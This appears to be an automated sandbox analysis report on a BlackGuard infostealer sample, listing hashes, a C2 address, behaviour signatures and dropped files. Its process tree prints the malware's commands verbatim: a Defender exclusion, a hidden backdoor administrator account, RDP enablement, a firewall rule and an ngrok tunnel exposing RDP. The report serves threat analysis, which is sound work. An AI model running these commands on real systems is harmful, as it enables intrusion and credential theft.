Analysis

  • max time kernel
    143s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230621-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-07-2023 07:01

General

  • Target

    Build1exe.exe

  • Size

    115KB

  • MD5

    bfaa027a645e567824a10a26fb8dbefd

  • SHA1

    4ab52a0b1cc105a5462c2255ef84be9af431b82e

  • SHA256

    c67b6f45d0beb461838f87ca2ad4774b52d7ccf9b0fa36652e8642dc72f43302

  • SHA512

    2f7ab0e4451cfeec017ba294cfcbc6f02d85c756bebce1cf9b3c69f6c77386fe9a21897734c44f4aa32dcaf3a1b7fbaaf0c4639edab1c8961761767a656b4569

  • SSDEEP

    1536:ztCbuEYE+9z2wpuFavGmhMnDIhzZtz20tnh/:5CbuAsEFNmhMnDIhNI0tnh/

Malware Config

Extracted

Family

blackguard

C2

http://94.142.138.111

Signatures

  • BlackGuard

    Infostealer first seen in Late 2021.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Downloads MZ/PE file
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets DLL path for service in the registry 2 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Allows Network login with blank passwords 1 TTPs 1 IoCs

    Allows local user accounts with blank passwords to access device from the network.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies registry class 14 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Build1exe.exe
    "C:\Users\Admin\AppData\Local\Temp\Build1exe.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1500
    • C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe
      "C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe"
      2⤵
      • Allows Network login with blank passwords
      • Checks computer location settings
      • Executes dropped EXE
      • Accesses Microsoft Outlook profiles
      • Adds Run key to start application
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      • outlook_office_path
      • outlook_win_path
      PID:4656
      • C:\Windows\System32\fodhelper.exe
        "C:\Windows\System32\fodhelper.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:64
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -command Add-MpPreference -ExclusionPath C:\
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3704
      • C:\Windows\System32\fodhelper.exe
        "C:\Windows\System32\fodhelper.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4396
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/Snup.bat
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4788
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Snup.bat""
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1216
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2004
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2400
              • C:\Windows\system32\find.exe
                Find "="
                7⤵
                  PID:2688
              • C:\Windows\system32\net.exe
                net user BlackTeam JesF3301asS /add /active:"yes" /expires:"never" /passwordchg:"NO"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4664
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 user BlackTeam JesF3301asS /add /active:"yes" /expires:"never" /passwordchg:"NO"
                  7⤵
                    PID:3484
                • C:\Windows\system32\net.exe
                  net localgroup Administrators BlackTeam /add
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4076
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 localgroup Administrators BlackTeam /add
                    7⤵
                      PID:4620
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1468
                    • C:\Windows\system32\find.exe
                      Find "="
                      7⤵
                        PID:4128
                      • C:\Windows\System32\Wbem\WMIC.exe
                        WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
                        7⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1008
                    • C:\Windows\system32\net.exe
                      net localgroup "Remote Desktop Users" BlackTeam /add
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2756
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 localgroup "Remote Desktop Users" BlackTeam /add
                        7⤵
                          PID:648
                      • C:\Windows\system32\net.exe
                        net accounts /forcelogoff:no /maxpwage:unlimited
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4208
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
                          7⤵
                            PID:2080
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
                          6⤵
                            PID:4388
                          • C:\Windows\system32\reg.exe
                            reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server'" /v "'fDenyTSConnections'" /t REG_DWORD /d 0x0 /f
                            6⤵
                              PID:2044
                            • C:\Windows\system32\reg.exe
                              reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxConnectionTime'" /t REG_DWORD /d 0x1 /f
                              6⤵
                                PID:1452
                              • C:\Windows\system32\reg.exe
                                reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxDisconnectionTime'" /t REG_DWORD /d 0x0 /f
                                6⤵
                                  PID:5060
                                • C:\Windows\system32\reg.exe
                                  reg add "'HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'" /v "'MaxIdleTime'" /t REG_DWORD /d 0x0 /f
                                  6⤵
                                    PID:4272
                                  • C:\Windows\system32\reg.exe
                                    reg add "'HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'" /v BlackTeam /t REG_DWORD /d 0x0 /f
                                    6⤵
                                      PID:4336
                                    • C:\Windows\system32\attrib.exe
                                      attrib C:\users\BlackTeam +r +a +s +h
                                      6⤵
                                      • Sets file to hidden
                                      • Views/modifies file attributes
                                      PID:576
                              • C:\Windows\System32\fodhelper.exe
                                "C:\Windows\System32\fodhelper.exe"
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5100
                                • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
                                  "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ngrok.exe config add-authtoken 2NyX6XCTEbUWXHKRvIrQm5uLmlE_89gv98vabRAC8AQ1jM6gV
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of WriteProcessMemory
                                  PID:1748
                                  • C:\Users\Admin\AppData\Local\Temp\ngrok.exe
                                    "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" config add-authtoken 2NyX6XCTEbUWXHKRvIrQm5uLmlE_89gv98vabRAC8AQ1jM6gV
                                    5⤵
                                    • Executes dropped EXE
                                    PID:3860
                              • C:\Windows\System32\fodhelper.exe
                                "C:\Windows\System32\fodhelper.exe"
                                3⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4864
                                • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
                                  "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ngrok.exe tcp 3389
                                  4⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4896
                                  • C:\Users\Admin\AppData\Local\Temp\ngrok.exe
                                    "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" tcp 3389
                                    5⤵
                                    • Executes dropped EXE
                                    • Modifies system certificate store
                                    PID:2076
                              • C:\Windows\System32\fodhelper.exe
                                "C:\Windows\System32\fodhelper.exe"
                                3⤵
                                  PID:3928
                                  • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
                                    "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/vhttd.exe -i
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1716
                                    • C:\Users\Admin\AppData\Local\Temp\vhttd.exe
                                      "C:\Users\Admin\AppData\Local\Temp\vhttd.exe" -i
                                      5⤵
                                      • Sets DLL path for service in the registry
                                      • Executes dropped EXE
                                      • Modifies WinLogon
                                      • Drops file in System32 directory
                                      • Drops file in Program Files directory
                                      PID:3188
                                      • C:\Windows\SYSTEM32\netsh.exe
                                        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                        6⤵
                                        • Modifies Windows Firewall
                                        PID:2584
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                              1⤵
                                PID:2648
                              • C:\Windows\System32\svchost.exe
                                C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                1⤵
                                • Loads dropped DLL
                                • Suspicious behavior: EnumeratesProcesses
                                PID:3620

                              Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Program Files\RDP Wrapper\rdpwrap.dll

                                Filesize

                                48KB

                                MD5

                                678a88c83e62ff5bf041a9ba87243fb4

                                SHA1

                                91a3c580f17172ed2c8d419af4b15e2c545d6a72

                                SHA256

                                c9786df320ad6127bece91c530bc6fddfff41286c944fd76d44b60799dbe49b8

                                SHA512

                                5392a452aceef18d3edc89c2998692dd73e551ed5c62c481a54daec564312a94fd99cc2dce2fdd18c6b297ff83ecfa181e78574423d008a456a8569f04c7daef

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

                                Filesize

                                2KB

                                MD5

                                d85ba6ff808d9e5444a4b369f5bc2730

                                SHA1

                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                SHA256

                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                SHA512

                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                944B

                                MD5

                                d28a889fd956d5cb3accfbaf1143eb6f

                                SHA1

                                157ba54b365341f8ff06707d996b3635da8446f7

                                SHA256

                                21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                                SHA512

                                0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                64B

                                MD5

                                4c1d4d9e62e20e2eccac10a5e9cd5fa8

                                SHA1

                                0c5b93ebec72e1bf977167cd08f4426530596190

                                SHA256

                                7729f5815a7412bd5de5a2d064d9f7671bad9e77fa0b79d7ed8b6d8d4b3b8250

                                SHA512

                                dd04dbc218adbe02b962b2699b536e37766bba525dcd950737e0cce4b79c6e337cf11baa710bd97e440e753d67bc7d2cd63276a56c5d544aa89738308f75d4bb

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Filesize

                                64B

                                MD5

                                446dd1cf97eaba21cf14d03aebc79f27

                                SHA1

                                36e4cc7367e0c7b40f4a8ace272941ea46373799

                                SHA256

                                a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                                SHA512

                                a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                              • C:\Users\Admin\AppData\Local\Temp\Snup.bat

                                Filesize

                                1KB

                                MD5

                                3bb16d80a3dbf1c6cdb06e52fcaab5ba

                                SHA1

                                59ab02029d135f93c5cd2b153d69663e216b1965

                                SHA256

                                6ad6b4cf1bc3786ceea552b17b244a49896ee703baf53d4008262790a79c97b5

                                SHA512

                                cec268b374ea8b739aaf72708d58bd425b79a411e9241ea6adfa44eb40204ed6ec509609e40b53fb6c468e037bc4b762a38a9160bf5e746c06c622e3fada5dcb

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jx1iwjgr.o2c.ps1

                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                              • C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe

                                Filesize

                                3.4MB

                                MD5

                                e695b8888af3b57f1a56961bd289463c

                                SHA1

                                e8c3892fcf4635a16fe91b9542953e2ac5141df2

                                SHA256

                                c5a45793d7c361f18d36c190b86c951bf0e7a01ad52132c7e9e9d4101eff73aa

                                SHA512

                                3c1ba39b7819020ad748bfd8bc0cca01fda5e5c7a2111ec6c034bf99e1974f27cb6a1ad7b3e26ffcfb150c447349661771fd21d54c25602ab01c1b1b43346ce1

                              • C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe

                                Filesize

                                3.4MB

                                MD5

                                e695b8888af3b57f1a56961bd289463c

                                SHA1

                                e8c3892fcf4635a16fe91b9542953e2ac5141df2

                                SHA256

                                c5a45793d7c361f18d36c190b86c951bf0e7a01ad52132c7e9e9d4101eff73aa

                                SHA512

                                3c1ba39b7819020ad748bfd8bc0cca01fda5e5c7a2111ec6c034bf99e1974f27cb6a1ad7b3e26ffcfb150c447349661771fd21d54c25602ab01c1b1b43346ce1

                              • C:\Users\Admin\AppData\Local\Temp\dtsmsys.exe

                                Filesize

                                3.4MB

                                MD5

                                e695b8888af3b57f1a56961bd289463c

                                SHA1

                                e8c3892fcf4635a16fe91b9542953e2ac5141df2

                                SHA256

                                c5a45793d7c361f18d36c190b86c951bf0e7a01ad52132c7e9e9d4101eff73aa

                                SHA512

                                3c1ba39b7819020ad748bfd8bc0cca01fda5e5c7a2111ec6c034bf99e1974f27cb6a1ad7b3e26ffcfb150c447349661771fd21d54c25602ab01c1b1b43346ce1

                              • C:\Users\Admin\AppData\Local\Temp\ngrok.exe

                                Filesize

                                20.5MB

                                MD5

                                0de87b2cb6b4f4c247d7f28b01f3575a

                                SHA1

                                336aec3afaf84c8dc897eea14d207c5240d04312

                                SHA256

                                05596cac3448ed1d0e132c96bd45f02769e08932d4e60be4c918fea9d1064ef7

                                SHA512

                                5e2d4e457b0ab97d899e8ee32c1dfc14ef58f8d7578c6268689b91e7efc4aa56d62038976a1085646e436da9f176135f76a1d6498baa29376731e4f9d3996599

                              • C:\Users\Admin\AppData\Local\Temp\ngrok.exe

                                Filesize

                                20.5MB

                                MD5

                                0de87b2cb6b4f4c247d7f28b01f3575a

                                SHA1

                                336aec3afaf84c8dc897eea14d207c5240d04312

                                SHA256

                                05596cac3448ed1d0e132c96bd45f02769e08932d4e60be4c918fea9d1064ef7

                                SHA512

                                5e2d4e457b0ab97d899e8ee32c1dfc14ef58f8d7578c6268689b91e7efc4aa56d62038976a1085646e436da9f176135f76a1d6498baa29376731e4f9d3996599

                              • C:\Users\Admin\AppData\Local\Temp\ngrok.exe

                                Filesize

                                20.5MB

                                MD5

                                0de87b2cb6b4f4c247d7f28b01f3575a

                                SHA1

                                336aec3afaf84c8dc897eea14d207c5240d04312

                                SHA256

                                05596cac3448ed1d0e132c96bd45f02769e08932d4e60be4c918fea9d1064ef7

                                SHA512

                                5e2d4e457b0ab97d899e8ee32c1dfc14ef58f8d7578c6268689b91e7efc4aa56d62038976a1085646e436da9f176135f76a1d6498baa29376731e4f9d3996599

                              • C:\Users\Admin\AppData\Local\Temp\vhttd.exe

                                Filesize

                                445KB

                                MD5

                                2612258ab4e2221b52974b5c0154fffd

                                SHA1

                                2aa58664874516b338325d1fd8205421815b2cba

                                SHA256

                                833d6f4de177cf07ceccbb0ceb910f7785df60941a61c7154ed747ec845f51ae

                                SHA512

                                02b000c89fc2f49f55e9ecacd17656cc5fbe948e2717ad4876b98d73ff30182cfa43ed05d0820cc4c427e79d6c7aaabf299a9c24158e34a96ad6008f9521483c

                              • C:\Users\Admin\AppData\Local\Temp\vhttd.exe

                                Filesize

                                445KB

                                MD5

                                2612258ab4e2221b52974b5c0154fffd

                                SHA1

                                2aa58664874516b338325d1fd8205421815b2cba

                                SHA256

                                833d6f4de177cf07ceccbb0ceb910f7785df60941a61c7154ed747ec845f51ae

                                SHA512

                                02b000c89fc2f49f55e9ecacd17656cc5fbe948e2717ad4876b98d73ff30182cfa43ed05d0820cc4c427e79d6c7aaabf299a9c24158e34a96ad6008f9521483c

                              • C:\Users\Admin\AppData\Local\hndtbrK.FEror\Files\SetHide.docx

                                Filesize

                                927KB

                                MD5

                                109b36186a778c52684d5a8cba13c0d1

                                SHA1

                                fba52fbec30a61a897bda2c857dd427281fc96ec

                                SHA256

                                21cb9f094bb72a040fbc200ec79e7c26e22f85b365345a2f212a313d2a15da50

                                SHA512

                                90468994450f9a95f3246f18448b15dacfeda02ab622c4fd081dae3082dbd1a8e9bd82cc804394e41c3e05e3d7562868a8d9ec40ca9b7133ca9a4d50c6cfa136

                              • C:\Users\Admin\AppData\Local\hndtbrK.FEror\sysInformation.txt

                                Filesize

                                809B

                                MD5

                                1b562262ecb01068d8875cb813f230c0

                                SHA1

                                6a2245b061f230f34cac7e6392651a73a4afb8b9

                                SHA256

                                7adc38fcb5f896b8799d961a124e7414f8de076c8c44e831c286c37465136e02

                                SHA512

                                232a42cf58cc1fd7983fd0f803a9e78b6d1f8704a2208d6cf824a824fb080d3930e746ac5a9781e3b7e4e2586af3ea9deae0b22c20a56a9550be206e56e69d3c

                              • C:\Users\Admin\AppData\Local\ngrok\ngrok.yml

                                Filesize

                                74B

                                MD5

                                3f59f4babd65b227a58360b831b98788

                                SHA1

                                defec650f03d965ed0e30998d674a548a5ef4409

                                SHA256

                                e3746d47fd21a64b5d0f18226370a7e76a514b62dcc6a61174b103539600a945

                                SHA512

                                26c464abf8fb60aef8eeb7717257d032ed68cee51cc794d0821b79e4e86df490d85144ff35afad4ac293fbb10765099e04ddaf2b51ec01948aad210ff6b6195c

                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                Filesize

                                6KB

                                MD5

                                fa5925d53010daf51baaf83a4530d0a7

                                SHA1

                                e98fe15b480bca64f327912896fb208e5d25e882

                                SHA256

                                6b0fa9c338771d61dd77986e99dab657e4f53d3d69743df73e8387ccb8a9c4f5

                                SHA512

                                e9960fa90ae77b5fc96ce3842ace46ddc3990b2ca4d3a29f01308587ce36d35095373f23b69be104f8ba05f2a9e5f64f0cbc0ac684d4de0e12bf223bf811812b

                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                Filesize

                                6KB

                                MD5

                                fa5925d53010daf51baaf83a4530d0a7

                                SHA1

                                e98fe15b480bca64f327912896fb208e5d25e882

                                SHA256

                                6b0fa9c338771d61dd77986e99dab657e4f53d3d69743df73e8387ccb8a9c4f5

                                SHA512

                                e9960fa90ae77b5fc96ce3842ace46ddc3990b2ca4d3a29f01308587ce36d35095373f23b69be104f8ba05f2a9e5f64f0cbc0ac684d4de0e12bf223bf811812b

                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                Filesize

                                6KB

                                MD5

                                9c3a3bcbf1e49c0aedc344ec01778c3f

                                SHA1

                                9467db573901474701063db2592179723b7ebff9

                                SHA256

                                0fc4e21d35e238d8ca8ff30d3f9151557cda995782506c0c5cbe6a77ed395ba0

                                SHA512

                                f1a69f448d63ade9e39c38c44146aee4ddce842de03e5a78ff7809bd6e26a4972e3d1984f8f510da8fdcad54ab716368eafdb35e61a7a889f8485b859de2c792

                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                Filesize

                                6KB

                                MD5

                                9c3a3bcbf1e49c0aedc344ec01778c3f

                                SHA1

                                9467db573901474701063db2592179723b7ebff9

                                SHA256

                                0fc4e21d35e238d8ca8ff30d3f9151557cda995782506c0c5cbe6a77ed395ba0

                                SHA512

                                f1a69f448d63ade9e39c38c44146aee4ddce842de03e5a78ff7809bd6e26a4972e3d1984f8f510da8fdcad54ab716368eafdb35e61a7a889f8485b859de2c792

                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                Filesize

                                6KB

                                MD5

                                6ecba2585d52e9e47fc41767651479d6

                                SHA1

                                c37605884aada75f012ece85ceaf9f8e49d3d9d0

                                SHA256

                                c7ac427681fe444b398542d373c6ec3588f7d30c791dc7dde63707b61cb52adf

                                SHA512

                                037d570887df4ac4cc89a145c27431e21b99efae95f0a83782ac6e863875bcd686c2ae92aca7b2cc194fc20fdefcc846b85e963e6641f4cb8d74260c9a8658a3

                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                Filesize

                                6KB

                                MD5

                                7f6e15b9d38e83860783e275fca01797

                                SHA1

                                5d5e0a45c8a698a848c91e32a750b030a2dc6359

                                SHA256

                                5d37a7d472f3470c331447aa47c861c26bde72fc6889e68d4423c69a65284117

                                SHA512

                                77699f3aefca3602001492685857c533296e31315e7fe30417fb31ad7d63286ff18dd25a7267424b3e3606cd68da378bbb80ef8f95dfe9fc9e47fbe74c019c24

                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                Filesize

                                6KB

                                MD5

                                7f6e15b9d38e83860783e275fca01797

                                SHA1

                                5d5e0a45c8a698a848c91e32a750b030a2dc6359

                                SHA256

                                5d37a7d472f3470c331447aa47c861c26bde72fc6889e68d4423c69a65284117

                                SHA512

                                77699f3aefca3602001492685857c533296e31315e7fe30417fb31ad7d63286ff18dd25a7267424b3e3606cd68da378bbb80ef8f95dfe9fc9e47fbe74c019c24

                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                Filesize

                                6KB

                                MD5

                                7549f1117ddcd74ea60a39ed7509f88a

                                SHA1

                                94c86586149b07421ff1f745360074424e0942c4

                                SHA256

                                5cc800846386194f6a6b622c071642c3ad6861a43fe715145dd2bf46d762bf5b

                                SHA512

                                0b6f5c833039805ce850efb571479bfbd5fe7617c2864856ea7f0f03a2e210fd7767ea46a354aed0f31493e4f778fb4fad4a571135c05b6ccfef3041b25a88e1

                              • \??\c:\program files\rdp wrapper\rdpwrap.dll

                                Filesize

                                48KB

                                MD5

                                678a88c83e62ff5bf041a9ba87243fb4

                                SHA1

                                91a3c580f17172ed2c8d419af4b15e2c545d6a72

                                SHA256

                                c9786df320ad6127bece91c530bc6fddfff41286c944fd76d44b60799dbe49b8

                                SHA512

                                5392a452aceef18d3edc89c2998692dd73e551ed5c62c481a54daec564312a94fd99cc2dce2fdd18c6b297ff83ecfa181e78574423d008a456a8569f04c7daef

                              • \??\c:\program files\rdp wrapper\rdpwrap.ini

                                Filesize

                                338KB

                                MD5

                                98082786e440be307873aafea2ea092e

                                SHA1

                                089f39ae279fec8fe2bf6d040457e9d3d566f348

                                SHA256

                                8de2b36a407ebc818459d6792b3f14cad6372a9c4756eeffeaf8455ccfba16e5

                                SHA512

                                2d069b1f6144cba156eb9734b074a8c2bc42bfce14baa622c25c29d5ca81a8bdc6076eb134b0c4eaa99e834a7cae69c69c7a6e88b86e8d5b2afbf58193b908a9

                              • memory/1500-133-0x00000218AE720000-0x00000218AE73A000-memory.dmp

                                Filesize

                                104KB

                              • memory/1500-134-0x00000218C8D50000-0x00000218C8D60000-memory.dmp

                                Filesize

                                64KB

                              • memory/1500-136-0x00000218C8D50000-0x00000218C8D60000-memory.dmp

                                Filesize

                                64KB

                              • memory/1716-289-0x0000023B34BD0000-0x0000023B34BE0000-memory.dmp

                                Filesize

                                64KB

                              • memory/1716-290-0x0000023B34BD0000-0x0000023B34BE0000-memory.dmp

                                Filesize

                                64KB

                              • memory/1716-288-0x0000023B34BD0000-0x0000023B34BE0000-memory.dmp

                                Filesize

                                64KB

                              • memory/1748-240-0x000001C352630000-0x000001C352640000-memory.dmp

                                Filesize

                                64KB

                              • memory/1748-241-0x000001C352630000-0x000001C352640000-memory.dmp

                                Filesize

                                64KB

                              • memory/1748-239-0x000001C352630000-0x000001C352640000-memory.dmp

                                Filesize

                                64KB

                              • memory/3188-293-0x0000000000400000-0x0000000000592000-memory.dmp

                                Filesize

                                1.6MB

                              • memory/3188-301-0x0000000000400000-0x0000000000592000-memory.dmp

                                Filesize

                                1.6MB

                              • memory/3620-300-0x00007FFEA27E0000-0x00007FFEA2806000-memory.dmp

                                Filesize

                                152KB

                              • memory/3704-163-0x00000193F65C0000-0x00000193F65D0000-memory.dmp

                                Filesize

                                64KB

                              • memory/3704-162-0x00000193F65C0000-0x00000193F65D0000-memory.dmp

                                Filesize

                                64KB

                              • memory/3704-164-0x00000193F65C0000-0x00000193F65D0000-memory.dmp

                                Filesize

                                64KB

                              • memory/4656-177-0x000001C3DDB50000-0x000001C3DDD12000-memory.dmp

                                Filesize

                                1.8MB

                              • memory/4656-148-0x000001C3C2730000-0x000001C3C2A7A000-memory.dmp

                                Filesize

                                3.3MB

                              • memory/4656-180-0x000001C3C2E00000-0x000001C3C2E10000-memory.dmp

                                Filesize

                                64KB

                              • memory/4656-179-0x000001C3DDAA0000-0x000001C3DDB16000-memory.dmp

                                Filesize

                                472KB

                              • memory/4656-149-0x000001C3C2E00000-0x000001C3C2E10000-memory.dmp

                                Filesize

                                64KB

                              • memory/4656-150-0x000001C3C46C0000-0x000001C3C46E2000-memory.dmp

                                Filesize

                                136KB

                              • memory/4656-178-0x000001C3DD9D0000-0x000001C3DDA20000-memory.dmp

                                Filesize

                                320KB

                              • memory/4788-218-0x000001661A000000-0x000001661A010000-memory.dmp

                                Filesize

                                64KB

                              • memory/4788-217-0x000001661A000000-0x000001661A010000-memory.dmp

                                Filesize

                                64KB

                              • memory/4896-272-0x000001CAA2010000-0x000001CAA2020000-memory.dmp

                                Filesize

                                64KB

                              • memory/4896-263-0x000001CAA2010000-0x000001CAA2020000-memory.dmp

                                Filesize

                                64KB

                              • memory/4896-262-0x000001CAA2010000-0x000001CAA2020000-memory.dmp

                                Filesize

                                64KB

                              • memory/4896-264-0x000001CAA2010000-0x000001CAA2020000-memory.dmp

                                Filesize

                                64KB

                              • memory/4896-270-0x000001CAA2010000-0x000001CAA2020000-memory.dmp

                                Filesize

                                64KB

                              • memory/4896-271-0x000001CAA2010000-0x000001CAA2020000-memory.dmp

                                Filesize

                                64KB